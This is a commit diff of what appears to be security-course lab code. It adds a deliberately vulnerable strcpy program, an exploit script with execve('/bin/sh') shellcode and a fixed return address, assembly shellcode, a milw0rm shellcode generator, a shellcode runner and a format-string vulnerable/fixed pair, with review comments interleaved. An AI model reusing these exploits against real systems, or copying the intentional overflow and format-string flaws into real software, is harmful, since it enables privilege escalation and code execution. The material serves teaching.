| author | Guillermo Ramos | 2013-05-27 00:07:01 +0200 | 
|---|---|---|
| committer | Guillermo Ramos | 2013-05-27 00:07:01 +0200 | 
| commit | 45ec0c7e1bfd251e13f4d3ade89785e98df31ba9 (patch) | |
| tree | 1f9b534ed4ea650517c39799f5e2aed0885ce87d /c_seguridad/code | |
| download | acm-45ec0c7e1bfd251e13f4d3ade89785e98df31ba9.tar.gz | |
Diffstat (limited to 'c_seguridad/code')
| -rw-r--r-- | c_seguridad/code/bof/.chuleta.txt | 1 | ||||
| -rw-r--r-- | c_seguridad/code/bof/exit.asm | 8 | ||||
| -rwxr-xr-x | c_seguridad/code/bof/exploit.py | 23 | ||||
| -rw-r--r-- | c_seguridad/code/bof/exploitable.c | 14 | ||||
| -rw-r--r-- | c_seguridad/code/bof/shellcode | 1 | ||||
| -rwxr-xr-x | c_seguridad/code/bof/shellcodeGen/shellcodeGen.c | 73 | ||||
| -rw-r--r-- | c_seguridad/code/bof/shellex.asm | 25 | ||||
| -rw-r--r-- | c_seguridad/code/bof/test.c | 15 | ||||
| -rw-r--r-- | c_seguridad/code/formatst/ejemplodospuntoce.c | 7 | ||||
| -rw-r--r-- | c_seguridad/code/formatst/ejemplotrespuntoce.c | 7 | ||||
| -rw-r--r-- | c_seguridad/code/stack/ejemplounopuntoce.c | 10 | ||||
| -rw-r--r-- | c_seguridad/code/stack/stack.c | 9 | ||||
| -rw-r--r-- | c_seguridad/code/strcmp.c | 19 | 
13 files changed, 212 insertions, 0 deletions
|
diff --git a/c_seguridad/code/bof/.chuleta.txt b/c_seguridad/code/bof/.chuleta.txt
new file mode 100644
index 0000000..b5ddbf3
--- /dev/null
+++ b/c_seguridad/code/bof/.chuleta.txt
@@ -0,0 +1 @@
+Exploitable (repetir función): perl -e 'print "A"x72 . "\xd4\x83\x04\x08"'
diff --git a/c_seguridad/code/bof/exit.asm b/c_seguridad/code/bof/exit.asm
new file mode 100644
index 0000000..1ee5f18
--- /dev/null
+++ b/c_seguridad/code/bof/exit.asm
@@ -0,0 +1,8 @@
+SECTION .text
+global _start
+_start:
+	xor		eax, eax
+	mov		al, 1
+	xor		ebx, ebx
+	mov		bl, 123
+	int		0x80
diff --git a/c_seguridad/code/bof/exploit.py b/c_seguridad/code/bof/exploit.py
new file mode 100755
index 0000000..5219755
--- /dev/null
+++ b/c_seguridad/code/bof/exploit.py
@@ -0,0 +1,23 @@
+#!/usr/bin/env python2
+# -*- coding: utf-8 -*-
+
+from time import sleep
+from os import system
+
+
+shellcode = (
+    # Buffer offset
+    "\x90"*17 +
+
+	# Shellcode (55 chars)
+	"\x31\xc0\xb0\x46\x31\xdb\x31\xc9\xcd\x80\xeb\x16\x31\xc0\x5b"
+	"\x88\x43\x07\x89\x5b\x08\x89\x43\x0c\xb0\x0b\x8d\x4b\x08\x8d"
+	"\x53\x0c\xcd\x80\xe8\xe5\xff\xff\xff\x2f\x62\x69\x6e\x2f\x73"
+	"\x68\x4e\x41\x41\x41\x41\x42\x42\x42\x42"
+
+    "\xf8\xf7\xff\xbf"
+    )
+
+cmd = "./exploitable " + shellcode
+
+print shellcode
diff --git a/c_seguridad/code/bof/exploitable.c b/c_seguridad/code/bof/exploitable.c
new file mode 100644
index 0000000..5492a29
--- /dev/null
+++ b/c_seguridad/code/bof/exploitable.c
@@ -0,0 +1,14 @@
+#include <string.h>
+#include <stdio.h>
+
+void vulnerable(char* str) {
+	printf("Entrando en vulnerable...\n");
+	char arr[60];
+	strcpy(arr, str);
+}
+
+int main(int argc, char** argv) {
+	if (argc > 1)
+		vulnerable(*(argv+1));
+	return 0;
+}
diff --git a/c_seguridad/code/bof/shellcode b/c_seguridad/code/bof/shellcode
new file mode 100644
index 0000000..e36a2c5
--- /dev/null
+++ b/c_seguridad/code/bof/shellcode
@@ -0,0 +1 @@
+1F11̀1[C[CKS̀/bin/shNAAAABBBB 
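Review bot: In exploit.py the line `cmd = "./exploitable " + shellcode` and the `sleep` and `system` imports are dead code, because the script only prints the payload; dropping them removes the doubt about whether the script is meant to launch the target itself. The tuple also mixes tab and four-space indentation, which is worth normalising. The last four bytes look like a fixed stack address, so the demonstration presumably depends on a lab host without address randomisation or a non-executable stack; a header comment such as `# Lab demo only: relies on a fixed stack address and an executable stack` would tell students which mitigations stop it.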
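Review bot: `strcpy(arr, str)` in vulnerable() copies a command-line argument of any length into the 60-byte `arr`, and nothing in exploitable.c says that this is deliberate. The formatst examples in this commit come as an unsafe/safe pair, but this file has no safe counterpart. I would add a comment such as `/* Intentionally vulnerable: unbounded copy into a fixed buffer, lab use only */` above the call, and a companion example using a bounded copy such as `snprintf(arr, sizeof arr, "%s", str);` so the class sees the fix next to the defect.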
diff --git a/c_seguridad/code/bof/shellcodeGen/shellcodeGen.c b/c_seguridad/code/bof/shellcodeGen/shellcodeGen.c
new file mode 100755
index 0000000..0221f48
--- /dev/null
+++ b/c_seguridad/code/bof/shellcodeGen/shellcodeGen.c
@@ -0,0 +1,73 @@
+/**
 + *
 + * BlackLight's shellcode generator for Linux x86
 + * Tested anywhere, working & NULL-free
 + *
 + * Usage: ./generator <cmd>
 + * ...and then you've got a ready2inject NULL-free shellcode for the command you like
 + *
 + * copyleft 2008 by BlackLight <blacklight[at]autistici.org>
 + * < http://blacklight.gotdns.org >
 + *
 + * Released under GPL v.3 licence
 + *
 + * Greetz to: evilsocket, for the idea he gave me  ;) 
 + * Greetz to: my friends, who tested, used and appreciated this code and helped
 + *      me to improve it to what it is now
 + * Greetz to: my girl, next to me in any moment even if she had no idea
 + *      about what I was doing ^^
 + */
 +
 +#include <stdio.h>
 +#include <stdlib.h>
 +#include <string.h>
 +
 +char code[] =
 +      "\\x60"                        /*pusha*/
 +      "\\x31\\xc0"                   /*xor    %eax,%eax*/
 +      "\\x31\\xd2"                   /*xor    %edx,%edx*/
 +      "\\xb0\\x0b"                   /*mov    $0xb,%al*/
 +      "\\x52"                        /*push   %edx*/
 +      "\\x68\\x6e\\x2f\\x73\\x68"    /*push   $0x68732f6e*/
 +      "\\x68\\x2f\\x2f\\x62\\x69"    /*push   $0x69622f2f*/
 +      "\\x89\\xe3"                   /*mov    %esp,%ebx*/
 +      "\\x52"                        /*push   %edx*/
 +      "\\x68\\x2d\\x63\\x63\\x63"    /*push   $0x6363632d*/
 +      "\\x89\\xe1"                   /*mov    %esp,%ecx*/
 +      "\\x52"                        /*push   %edx*/
 +      "\\xeb\\x07"                   /*jmp   804839a <cmd>*/
 +      "\\x51"                        /*push   %ecx*/
 +      "\\x53"                        /*push   %ebx*/
 +      "\\x89\\xe1"                   /*mov    %esp,%ecx*/
 +      "\\xcd\\x80"                   /*int    $0x80*/
 +      "\\x61"                        /*popa*/
 +      "\\xe8\\xf4\\xff\\xff\\xff"    /*call  8048393 <l1>*/;
 +
 +int main (int argc, char **argv)  {
 +      int i,len=0;
 +      char *shell,*cmd;
 +
 +      if (!argv[1])
 +              exit(1);
 +
 +      for (i=1; i<argc; i++)
 +              len += strlen(argv[i]);
 +      len += argc;
 +
 +      cmd = (char*) malloc(len);
 +
 +      for (i=1; i<argc; i++)  {
 +              strcat (cmd,argv[i]);
 +              strcat (cmd,"\x20");
 +      }
 +
 +      cmd[strlen(cmd)-1]=0;
 +      shell = (char*) malloc( sizeof(code) + (strlen(argv[1]))*5 + 1 );
 +      memcpy (shell,code,sizeof(code));
 +
 +      for (i=0; i<strlen(cmd); i++)
 +              sprintf (shell,"%s\\x%.2x",shell,cmd[i]);
 +      printf ("%s\n",shell);
 +}
 +
 +// milw0rm.com [2008-08-19]
\ No newline at end of file
diff --git a/c_seguridad/code/bof/shellex.asm b/c_seguridad/code/bof/shellex.asm
new file mode 100644
index 0000000..00968ea
--- /dev/null
+++ b/c_seguridad/code/bof/shellex.asm
@@ -0,0 +1,25 @@
+SECTION .text
+global _start
+_start:
+	xor		eax, eax
+	mov		al, 70
+	xor		ebx, ebx
+	xor		ecx, ecx
+	int		0x80
+
+	jmp short ender
+
+starter:
+	xor		eax, eax
+	pop		ebx
+	mov		[ebx+7], al
+	mov		[ebx+8], ebx
+	mov		[ebx+12], eax
+	mov		al, 11
+	lea		ecx, [ebx+8]
+	lea		edx, [ebx+12]
+	int		0x80
+
+ender:
+	call starter
+	db "/bin/shNAAAABBBB"
diff --git a/c_seguridad/code/bof/test.c b/c_seguridad/code/bof/test.c
new file mode 100644
index 0000000..c88c260
--- /dev/null
+++ b/c_seguridad/code/bof/test.c
@@ -0,0 +1,15 @@
+char shellcode[] =
+"\x31\xc0\xb0\x46\x31\xdb\x31\xc9\xcd\x80\xeb\x16\x31\xc0\x5b"
+"\x88\x43\x07\x89\x5b\x08\x89\x43\x0c\xb0\x0b\x8d\x4b\x08\x8d"
+"\x53\x0c\xcd\x80\xe8\xe5\xff\xff\xff\x2f\x62\x69\x6e\x2f\x73"
+"\x68\x4e\x41\x41\x41\x41\x42\x42\x42\x42";
+
+//char shellcode[] =
+//"\x31\xc0\xb0\x01\x31\xdb\xb3\x7b\xcd\x80";
+
+
+int main() {
+	int (*func)();
+	func = (int (*)()) shellcode;
+	(*func)();
+}
diff --git a/c_seguridad/code/formatst/ejemplodospuntoce.c b/c_seguridad/code/formatst/ejemplodospuntoce.c
new file mode 100644
index 0000000..6f7f181
--- /dev/null
+++ b/c_seguridad/code/formatst/ejemplodospuntoce.c
@@ -0,0 +1,7 @@
+#include <stdio.h>
+
+int main(int argc, char** argv) {
+	if (argc > 1)
+		printf(argv[1]);
+	return 0;
+}
diff --git a/c_seguridad/code/formatst/ejemplotrespuntoce.c b/c_seguridad/code/formatst/ejemplotrespuntoce.c
new file mode 100644
index 0000000..8e49d87
--- /dev/null
+++ b/c_seguridad/code/formatst/ejemplotrespuntoce.c
@@ -0,0 +1,7 @@
+#include <stdio.h>
+
+int main(int argc, char** argv) {
+	if (argc > 1)
+		printf("%s", argv[1]);
+	return 0;
+}
diff --git a/c_seguridad/code/stack/ejemplounopuntoce.c b/c_seguridad/code/stack/ejemplounopuntoce.c
new file mode 100644
index 0000000..4d2425e 
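Review bot: main() in shellcodeGen.c calls `strcat (cmd,argv[i])` on a buffer that comes straight from `malloc` and is never set to an empty string, so the first append scans indeterminate bytes; `cmd = calloc(len, 1);` with a NULL check removes that. The output buffer is sized from `strlen(argv[1])`, yet the loop appends four characters for every byte of the joined `cmd`, so a run with more than one argument can write past the end of `shell`; sizing it as `sizeof(code) + 4 * strlen(cmd)` matches what the loop writes. `sprintf (shell,"%s\\x%.2x",shell,cmd[i])` passes the destination as its own source, which is undefined behaviour, and `cmd[i]` needs a cast to `unsigned char` so that bytes above 0x7f are not sign-extended into eight hex digits. Neither allocation is checked or freed.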
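Review bot: test.c casts the `shellcode` data array to `int (*)()` and calls it, which is undefined behaviour in C and can only work where data pages are executable, and the file has no comment saying so. Where non-executable data is enforced the call is expected to fault immediately, which is worth stating because it shows the mitigation at work; I would add `/* Runs bytes from a data array as code; expected to fault where NX/W^X is enforced */` above main. `int main()` would also read better as `int main(void)` with an explicit `return 0;`.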
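Review bot: `printf(argv[1]);` in ejemplodospuntoce.c uses a command-line argument as the format string, so any conversion specifiers in the argument are interpreted by printf. The next file, ejemplotrespuntoce.c, holds the corrected call `printf("%s", argv[1]);`, but neither file mentions the other. A comment such as `/* Intentionally unsafe: user input used as the format string; see ejemplotrespuntoce.c for the fix */` would make the pairing explicit, and building the example with `-Wformat -Wformat-security` shows students that the compiler can flag this pattern.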
--- /dev/null
+++ b/c_seguridad/code/stack/ejemplounopuntoce.c
@@ -0,0 +1,10 @@
+#include <stdlib.h>
+
+char global;
+float pi = 3.14;
+
+int main() {
+	int local;
+	char* buffer = (char*)malloc(20);
+	return 0;
+}
diff --git a/c_seguridad/code/stack/stack.c b/c_seguridad/code/stack/stack.c
new file mode 100644
index 0000000..2987356
--- /dev/null
+++ b/c_seguridad/code/stack/stack.c
@@ -0,0 +1,9 @@
+#include <stdlib.h>
+
+int global = 0x11111111;
+
+int main() {
+	int local = 0x22222222;
+	char buffer[] = "AAAABBBBCCCCDDD";
+	return 0;
+}
diff --git a/c_seguridad/code/strcmp.c b/c_seguridad/code/strcmp.c
new file mode 100644
index 0000000..23ab60a
--- /dev/null
+++ b/c_seguridad/code/strcmp.c
@@ -0,0 +1,19 @@
+#include <stdio.h>
+#include <string.h>
+
+int main() {
+	char str1[] = "aaaa";
+	char str2[] = "aaaa";
+
+	if (strcmp(str1, str2) == 0)
+		printf("strcmp: Son iguales\n");
+	else
+		printf("strcmp: No son iguales\n");
+
+	if (str1 == str2)
+		printf("==: Son iguales\n");
+	else
+		printf("==: No son iguales\n");
+
+	return 0;
+}
|
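Review bot: `if (str1 == str2)` in strcmp.c compares the addresses of two distinct arrays, so that branch is false whatever the arrays contain; this appears to be the point of the example, but nothing in the file says so. A comment such as `/* == compares the arrays' addresses, not their contents */` above the second `if` would keep a reader from taking it for a bug, and would make the lesson explicit for code that compares credentials or tokens.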
